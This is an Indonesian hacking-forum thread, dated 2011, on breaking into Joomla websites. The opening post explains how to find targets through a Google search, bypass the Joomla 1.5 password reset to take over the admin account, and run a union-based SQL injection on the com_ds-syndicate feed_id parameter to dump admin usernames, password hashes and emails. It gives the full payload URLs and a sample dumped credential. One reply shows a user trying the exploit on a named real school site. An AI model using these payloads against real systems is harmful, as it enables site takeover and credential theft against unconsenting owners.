.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 eksploitasi cms joomla

Go down 
5 posters
PengirimMessage
Black.exe
Global Mod
Global Mod
Black.exe


Jumlah posting : 844
Points : 1491
Reputation : 44
Join date : 08.01.11
Age : 35

eksploitasi cms joomla Empty
PostSubyek: eksploitasi cms joomla   eksploitasi cms joomla Icon_minitimeWed Jul 27, 2011 11:57 pm

Joomla merupakan salah satu content management system (CMS) yang cukup populer. Namun, Joomla terbaru, versi 1.5, memiliki celah keamanan yang cukup fatal. Polanya sama dengan SQL Injection yang relatif kuno. SQL Injection juga pernah dipake xnuxer untuk membobol situs Komisi Pemilihan umum (KPU) beberapa tahun lampau.
Berikut ini cara-cara membobol situs berbasis Joomla 1.5.
1. Buka alamat target yang menggunakan Joomla 1.5. Anda bisa menemukan di Google dengan mengetikkan “by Joomla 1.5? di kolom pencrian. Sebab, secara default, kalimat ini ada dalam setiap footer situs berbasis Joomla 1.5.
2. Tambahkan baris di bawah ini setelah alamat target.
index.php?option=com_user&view=reset&layout=confirm
Menjadi:
target.com/index.php?option=com_user&view=reset&layout=confirm
2. Tuliskan pada kolom “token” karakter(tanda) ‘ dan klik OK.
3. Isi password baru untuk admin.
4. Buka halaman target.com/administrator/.
5. Login admin dengan password baru.
6. Lakukan yang Anda suka secara bertanggung jawab.
Cara ini terjadi karena kesalahan coding pada file /components/com_user/models/reset.php dan /components/com_user/models/controller.php.
NB:Posting ini hanya untuk pengetahuan. Segala bentuk penyalahgunaaan adalah tanggung jawab masing-masing .Dan bukittinggihackers tidak bertanggung jawab pada sesuatu hal yg di salah gunakan oleh orang-orang yg tidak bertanggung jawab dan kami menyarankan supaya anda meng -update Joomla anda ke versi yg terbaru
Mereset password joomla
Administrator juga manusia, kadang sang admin pun bisa lupa password untuk login sebagai Administrator websitenya. Anda pun mungkin akan mengalami sedikit masalah jika Anda web yang Anda kelola tersebut masih berada di localhost dan Anda tidak terhubung ke internet, karena fasilitas “Forgot Password” akan mengirim password baru Anda ke email Anda.
Kali ini saya akan coba kasih langkah-langkah untuk mereset password Administrator atau pun user di Joomla jika Anda tidak terhubung ke internet dan web Anda masih di localhost. Langkah-Langkah Mereset Password
1. Liat tabel users Joomla di phpMyadmin
2. Kemudian edit dan ganti password admin/user sesuai dengan yang loe mau, jangan lupa password baru yang akan loe masukin itu harus udah di MD5 dulu. Kalo ga ngerti apa itu MD5, ganti aja passwordnya dengan “226776f356d7ecf58b60bab12a05d38f” (tanpa kutip).
Kemudian coba masuk ke /administrator dan login sebagai administrator Joomla, masukkan user id yang tadi loe rubah passwordnya, kemudian di kolom password ketikkan “joomla” (tanpa kutip).Dan Selamat Mengutak atik joomla anda
SQL Injection pada Joomla (hack Joomla)
Apa jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin tidak memperhatikan security risk yang ada? Apa jadinya jika ‘the choosen one’ ternyata seorang admin yang tidak tahu sama sekali mengenai system keamanan sebuah data? Ironi memang. Bahkan terkadang ada admin yang meremehkan system keamanan. Apa jadinya jika server anda memiliki konfigurasi default? Apa jadinya, apa jadinya? Dan segudang akibat dari hasil penggabungan dua kata tersebut. Yang terjadi adalah peluang seorang attacker untuk menyusup ke dalam website anda semakin memungkinkan, mengobrak-abrik server anda, bahkan tidak jarang seorang attacker mengambil profit dari exploitasi system yang ada. Dalam berbagai hal, termasuk mendulang dollar dengan cara tidak halal. Seperti yang dilakukan oleh para carder.
Penulis akan menjelaskan betapa mudahnya sebuah web dieksploitasi hanya dengan bermodalkan internet dan browser internet tentunya, dan sedikit pengetahuan sql query. Perlu penulis jelaskan, penulis hanyalah seorang manusia biasa yang memiliki pengetahuan minimal dari sistem keamanan data.
Ya, belum lama ini, salah satu component joomla terbukti mengidap penyakit berbahaya, tumor ganas yang akan menjalar keseluruh tubuh, dan berakibat kematian pada akhirnya. :D ~~
Telah ditemukan bug sql injection pada com_ds-syndicate, ini adalah salah satu contoh dari sekian banyak bug fatal yang terdapat dalam joomla. Waspadalah! Kesalahan terjadi karena komponen ini tidak menyediakan filtering sql yang ketat dalam variable feed_id. Penyusupan dapat dilakukan, sederhananya ini terjadi karena kesalahan dari variable feed_id. Dan saat menulis artikel ini ada beberapa site masih memiliki kecacatan seperti ini.
Ya, Langsung aja …
[You must be registered and logged in to see this link.] korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1
Url ini menampilkan feeds seperti biasanya, tapi beda halnya jika kita tes kelemahannya, dengan penambahan tanda kutip ( ‘ ) di belakangnya.
[You must be registered and logged in to see this link.] korban.com/index2.php?option=ds-syndicate&version=1&feed_id=1′
Apa yang terjadi ? … error…
Langkah selanjutnya adalah cari urutan si table ‘dssyndicate_feeds’ dengan mendapatkan bentuk error yang sama, dan berhenti ketika mendapatkan error yang berbeda :
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+1/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+2/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+3/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+4/* –> errornya sama
index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+20/* –> errornya sama

index2.php?option=ds-syndicate&version=1&feed_id=1+order+by+21/* –> errornya berbeda
perhatikan bentuk error-nya berbeda ketika feed_id yang diisi dengan 1+order+by+21/*, ini adalah patokan untuk melakukan injeksi sql yang selanjutnya.
Langkah selanjutnya adalah penggunaan union, lebih jelasnya mengenai fungsi union, silahkan baca di sini.
Selanjutnya kita test, apakah fungsi union dapat berjalan pada url korban.
index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,
15,16,17,18,19,20+from+wc_users
lihat paling akhir dari baris tersebut,
from+wc_users
wc_users adalah nama table yang diambil dari struktur database joomla. Berisi mengenai informasi login user.
Sedangkan 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ini diperoleh berdasarkan yang telah penulis jelaskan sebelumnya.
Ya setelah url di atas di enter, yang perlu dilakukan adalah mendownload file tersebut,
Setelah itu buka file yang baru didownload tersebut dengan editor seperti notepad, walaupun filenya xml, tapi penulis tetap menyarankan untuk membukanya dengan notepad, tidak dengan browser internet, karena memudahkan untuk pembacaan hasil dari sql injection yang telah dilakukan.
Lihat angka 2 di dalam tag
Jangan pedulikan angka (18) di belakangnya, yang perlu diperhatikan adalah angka 2-nya. Ini berarti berdasarkan hasil query union menggunakan browser tadi, anda dapat menggunakan angka 2 tersebut untuk keperluan selanjutnya. Seperti mengganti angka 2 dengan kumpulan karakter lain untuk menggunakannya seperti melihat versi mysql yang digunakan, ya langsung saja, kita akan mencobanya untuk melihat versi mysql yang digunakan oleh si korban. Gunakan url ini …
[You must be registered and logged in to see this link.]
@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from
+wc_users
perhatikan angka 2 diganti dengan kalimat @@version, enter, kemudian buka kembali file telah di download dengan notepad, apa yang terjadi ? title berubah menjadi versi si mysql, yang penulis dapatkan :
Mysql versi 5.0.33 :D , sampai sini anda telah dapat eksplorasi database user dengan leluasa. Apa yang dilakukan seorang attacker selanjutnya ? ya, mendapatkan username dan password si admin. :D .
Pengambilan username dan password secara paksa menggunakan sql injection ini dapat dilakukan secara satu persatu, ataupun sekaligus. Query untuk menampilkan username menggunakan bug sql injection yang satu ini, anda cukup mengganti @@version yang tadi dengan field yang menyimpan informasi username tentunya, gunakan url ini :
[You must be registered and logged in to see this link.]
username,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users
jalankan url, download filenya, kemudian buka kembali dengan notepad. Hasilnya adalah username dari database tersebut …
Atau bisa juga ditampilkan informasi username, password, email, dan user_type sekaligus, gunakan url seperti ini :
[You must be registered and logged in to see this link.]
concat(username,0x3a,password,0x3a,email,0x3a,usertype),3,
4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+wc_users
perhatikan, string username, diganti dengan concat(username,0x3a,password,0x3a,email,0x3a,usertype), penggunaan concat disini adalah mengconvert suatu hexa, ataupun spesial karakter kedalam bentuk ascii, sehingga, yang terjadi nantinya adalah :
0x3a berubah menjadi titik dua ( : ), buka kembali file hasil dari url di atas. Yang penulis dapatkan adalah informasi seperti ini :
admin:bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK: [You must be registered and logged in to see this link.] e-mail address is being protected from spambots, you need JavaScript enabled to view it :Super Administrator
Jika di urutkan :
Username : admin
Password ( hash ) : bd3ca378488e00055d5b23df1252e443:EbnV8pXgTqIgApjK
Email : [You must be registered and logged in to see this link.] e-mail address is being protected from spambots, you need JavaScript enabled to view it
User type : Super Administrator
Yang di lakukan selanjutnya adalah mencoba crack password, karena itu masih dalam bentuk hash, dengan kata lain password yang masih terenkripsi. :D . Yups, pengambilan username dan password secara paksa telah terjadi, si attacker kembali mencari cara bagaimana mendapatkan password yang asli, dengan cara mengcrack password hash tersebut.
Inilah bukti begitu mudahnya suatu web diambil alih oleh attacker, akibat dari seorang admin yang malas melakukan patch pada systemnya.
Di artikel selanjutnya penulis akan menjalankan konsep sederhana password crack untuk joomla menggunakan php. Tunggu kelanjutannya … :D .
Untuk keperluan experiment, silahkan download filenya di sini.
[You must be registered and logged in to see this link.]
Kembali Ke Atas Go down
zer03s
Administrator
Administrator
zer03s


Jumlah posting : 2471
Points : 4119
Reputation : 113
Join date : 13.12.10
Age : 32
Lokasi : /home/root/blackc0de

eksploitasi cms joomla Empty
PostSubyek: Re: eksploitasi cms joomla   eksploitasi cms joomla Icon_minitimeThu Jul 28, 2011 6:59 pm

nyimak dolo om black :becak:
Kembali Ke Atas Go down
http://zer03s.blog.com/
artake
Moderator
Moderator
artake


Jumlah posting : 246
Points : 294
Reputation : 13
Join date : 02.05.11
Age : 34
Lokasi : C:/L3g.0n

eksploitasi cms joomla Empty
PostSubyek: Re: eksploitasi cms joomla   eksploitasi cms joomla Icon_minitimeThu Jul 28, 2011 7:22 pm

ih . . kok mantab . . . eksploitasi cms joomla 3529815765
Kembali Ke Atas Go down
JiBl1z
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 3
Points : 5
Reputation : 0
Join date : 03.04.12

eksploitasi cms joomla Empty
PostSubyek: Re: eksploitasi cms joomla   eksploitasi cms joomla Icon_minitimeSun Apr 08, 2012 5:11 pm

ngga work gan disini
Code:
http://www.smpit-arrudho.com/index.php?option=com_user&view=reset&layout=confirm
Kembali Ke Atas Go down
http://www.jibril-jackson.co.cc
djsamm88
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 4
Points : 4
Reputation : 0
Join date : 04.05.12

eksploitasi cms joomla Empty
PostSubyek: Re: eksploitasi cms joomla   eksploitasi cms joomla Icon_minitimeSun May 20, 2012 3:46 am

lebih lengkap mengenai deface silahkan kunjungi,,...
[You must be registered and logged in to see this link.] eksploitasi cms joomla 187827569
Kembali Ke Atas Go down
http://www.djsamm88.web.id
Sponsored content





eksploitasi cms joomla Empty
PostSubyek: Re: eksploitasi cms joomla   eksploitasi cms joomla Icon_minitime

Kembali Ke Atas Go down
 
eksploitasi cms joomla
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» EKSPLOITASI RPC pada windows
» For Pecinta Joomla...
» 54 Joomla RFI bugs
» [HELP]Username pas exploit joomla
»  Mambo & Joomla Script RFI Bugs

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Web attack-
Navigasi: